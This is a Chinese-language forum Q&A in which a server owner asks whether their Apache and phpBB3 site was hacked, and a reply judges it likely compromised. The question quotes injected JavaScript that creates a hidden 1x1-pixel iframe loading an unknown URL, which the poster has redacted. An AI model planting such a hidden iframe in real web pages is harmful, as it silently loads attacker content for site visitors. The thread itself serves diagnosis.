我的服务器被攻击了吗?

0 hacking apache-2.2

我今天登录我的服务器,在我的目录浏览窗口顶部看到以下无法识别的代码:

document.writeln("");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "[由作者编辑,此处未知 URL]";

我不认识 URL(我已将其删除)。

另外,我的phpBB3留言板顶部有一些phpBB调试和PHP通知,对我来说都是新的。此外,论坛代码中的某些链接似乎已被垃圾字符损坏。

没有添加或删除其他内容,但这引起了我的主要担忧。

我网站上的每个页面都受到 Apache 登录提示的保护,我认为这是足够的保护。

我是被攻击了,还是在阴影中跳跃?

Sha*_*den 6

不幸的是,从神秘 URL 加载内容的 iframe 几乎可以肯定是妥协的表现。

需要由专家进行非常彻底的调查才能找到漏洞的级别,但对代码进行这样的修改将意味着设备已完全受到损害。至于接下来要做什么,请阅读此处